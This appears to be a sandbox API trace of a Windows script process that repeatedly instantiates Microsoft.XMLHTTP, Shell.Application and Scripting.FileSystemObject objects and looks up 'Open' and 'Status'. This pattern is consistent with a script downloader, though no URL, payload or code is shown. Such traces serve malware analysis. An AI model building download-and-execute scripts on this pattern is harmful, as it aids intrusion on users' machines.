	[0478.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0478.739] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0478.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0478.739] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0478.739] SysStringLen (param_1=0x0) returned 0x0
	[0478.739] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0478.739] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0478.739] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0478.739] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0478.739] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0478.740] ??2@YAPEAX_K@Z () returned 0x62f350
	[0478.740] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0478.740] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0478.740] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0478.740] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0478.740] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0478.740] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0478.740] SysStringLen (param_1=0x0) returned 0x0
	[0478.740] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0478.743] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0478.743] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0478.743] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0478.743] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0478.743] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0478.744] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0479.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0479.961] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0479.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0479.963] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0479.963] SysStringLen (param_1=0x0) returned 0x0
	[0479.963] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0479.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0479.963] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0479.963] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0479.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0479.963] ??2@YAPEAX_K@Z () returned 0x62f330
	[0479.963] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0479.963] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0479.963] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0479.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0479.963] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0479.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.964] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0479.966] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0479.966] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0479.966] SysStringLen (param_1=0x0) returned 0x0
	[0479.966] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0479.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0479.967] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0479.967] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0479.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0479.967] ??2@YAPEAX_K@Z () returned 0x62f310
	[0479.967] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0479.967] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0479.967] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0479.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0479.967] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0479.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.968] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0479.968] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0479.968] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0479.968] SysStringLen (param_1=0x0) returned 0x0
	[0479.968] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0479.968] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0479.969] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0479.969] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0479.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0479.969] ??2@YAPEAX_K@Z () returned 0x62f330
	[0479.969] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0479.969] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0479.969] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0479.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0479.969] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0479.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.969] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0479.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0479.970] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0479.970] SysStringLen (param_1=0x0) returned 0x0
	[0479.970] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0479.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0479.970] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0479.970] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0479.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0479.970] ??2@YAPEAX_K@Z () returned 0x62f310
	[0479.970] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0479.970] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0479.970] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0479.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0479.970] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0479.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.971] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0479.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0479.971] longjmp () 
	[0479.971] longjmp () 
	[0479.971] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0479.971] SysStringLen (param_1=0x0) returned 0x0
	[0479.971] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0479.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0479.971] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0479.972] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
